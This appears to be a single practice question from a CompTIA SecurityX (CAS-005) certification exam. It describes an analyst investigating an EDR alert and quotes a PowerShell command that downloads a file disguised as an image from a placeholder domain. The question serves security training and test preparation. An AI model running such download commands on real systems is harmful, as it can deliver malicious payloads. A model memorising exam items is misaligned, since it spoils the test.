CompTIA SecurityX (CAS-005) CAS-005 — Question 358
Topic 1 · Question 358 of 393
Topic 1 · Question 358
A security analyst is investigating an EDR alert and notices the following commands from the shell: PS > iwr -uri http://domain.com/happy.jpg -outfile .\important.url The only artifact that the analyst has access to is a network packet capture. Which of the following actions would most likely confirm whether the file is malicious?